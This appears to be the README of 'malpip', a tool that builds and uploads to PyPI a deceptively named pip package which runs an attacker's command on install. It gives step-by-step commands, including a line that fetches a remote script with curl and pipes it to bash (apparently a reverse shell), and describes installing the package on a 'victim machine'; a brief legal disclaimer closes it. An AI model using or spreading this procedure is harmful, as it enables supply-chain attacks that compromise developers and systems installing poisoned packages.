Tool that creates a malicious pip package that runs your command during installation.
Create an account on https://pypi.org
- Clone repository and set permissions.
git clone https://github.com/thegoodhackertv/malpip.git
cd malpip
sudo chmod +x malpip.sh- Install dependencies.
sudo ./malpip install- Set the command to be executed.
echo "curl -s http://localhost/rev.sh | bash" > command.txt- Create malicious project. You will be asked for your pypi credentials to upload the project.
./malpip create nothingmalicious command.txt- Install the package on the victim machine and your command will be executed.
pip install nothingmalicious- Youtube video (spanish)
- Website post (spanish)
Usage of these scripts for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.
